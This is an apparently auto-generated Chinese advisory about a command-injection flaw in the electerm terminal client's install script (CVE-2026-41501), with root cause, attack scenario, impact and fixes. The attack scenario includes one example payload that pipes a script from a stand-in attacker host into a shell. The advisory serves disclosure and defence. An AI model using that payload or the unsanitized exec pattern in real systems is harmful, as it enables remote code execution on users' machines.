📋 漏洞概述

electerm 终端客户端在安装脚本中存在命令注入漏洞，远程攻击者可通过控制版本字符串实现任意命令执行。

📋 基础信息

🔬 漏洞根因

在 npm/install.js 第130行的 runLinux() 函数中，程序使用 exec() 执行 'rm -rf' 命令清理临时文件，但清理目标路径直接拼接了来自远程服务器、由攻击者可控的版本字符串。由于未对版本字符串进行任何过滤或无害化处理，攻击者可以注入额外的 shell 命令，例如通过分号或管道符将恶意指令拼接到原命令之后，导致任意命令执行。推测该字符串可能来自 npm registry 的返回或 GitHub Release 信息，且未经过严格校验。

🎯 攻击场景

1. 攻击者搭建一个恶意 npm registry 或通过中间人攻击篡改 electerm 的安装源，返回一个包含恶意负载的版本字符串，例如 '1.0.0; curl http://attacker.com/payload.sh | sh'；2. 用户在使用了受影响版本（<3.3.8）的环境下运行 electerm 的安装脚本（或自动触发 postinstall 脚本）；3. 脚本执行到 runLinux() 函数，将伪造的版本字符串拼入 exec('rm -rf ...') 命令中；4. 操作系统执行该命令，攻击者的注入命令（curl 及后续 shell）随之运行；5. 攻击者成功在目标设备上获得远程代码执行权限，可安装后门、窃取数据或横向移动。

💥 漏洞影响

攻击者可实现远程代码执行（RCE），完全控制受影响主机，包括但不限于：执行任意系统命令、安装恶意软件、窃取 SSH 私钥、会话凭证、文件数据，以及利用被控主机作为跳板攻击内网其他系统。由于 CVSS 评分为 9.8，影响范围覆盖所有使用该版本 electerm 的 Linux 系统用户，尤其是开发运维人员。

🛡️ 修复建议

立即将 electerm 升级至 3.3.8 或更高版本；临时缓解措施：在升级前手动审查并移除安装脚本中对不可信输入的 exec 调用，或添加白名单路径校验；也可通过修改本地 hosts 文件将 npm registry 域名指向受信任的镜像源，防止中间人攻击。

📎 参考链接

• https://nvd.nist.gov/vuln/detail/CVE-2026-41501
• https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-41501
• 原始来源（NVD-Latest）

⚠️ 本文由漏洞情报系统自动生成，仅供安全研究与防御参考。生成时间: 2026-05-10 08:08 | 来源: NVD-Latest